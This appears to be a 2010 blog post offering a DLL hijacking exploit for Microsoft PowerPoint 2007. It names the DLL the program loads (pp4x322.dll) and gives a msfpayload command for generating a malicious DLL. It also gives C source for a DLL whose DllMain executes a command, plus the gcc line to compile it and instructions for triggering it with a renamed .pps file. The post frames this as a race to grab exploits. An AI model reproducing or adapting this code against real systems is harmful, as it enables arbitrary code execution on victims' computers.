Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)

25 08 2010

Today is a crazy day with everyone and there mother searching for DLL Hijacking Exploits. They are going quick so get in before they are all gone. 🙂 Bellow is a exploit I found for .pps files in MS Power Point 2007. Power Point looks for pp4x322.dll and loads it. This will not work with real .pps but will work with a text file if extension is changed to a .pps instead of .txt. I have tested it on Windows 7 64bit and it works. Rapid 7 has a great article on DLL Hijacking and it is a must read.

msfpayload windows/exec CMD=calc.exe D > pp4x322.dll

Exploit Title: Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)
Date: August 25, 2010
Author: monstream00 (monstream00 [at}
Modified storm's exploit for pp4x322.dll and used Rapid7 write up to find. Happy hunting.
Rapid7 write up:
Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002

gcc -shared -o pp4x322.dll powerpoint2007-DLL.c
.pps file affected. */ #include windows.h int hax() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { hax(); return 0; }

Also see corelan for a unofficial list of DLL Hijacking Exploits.




Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: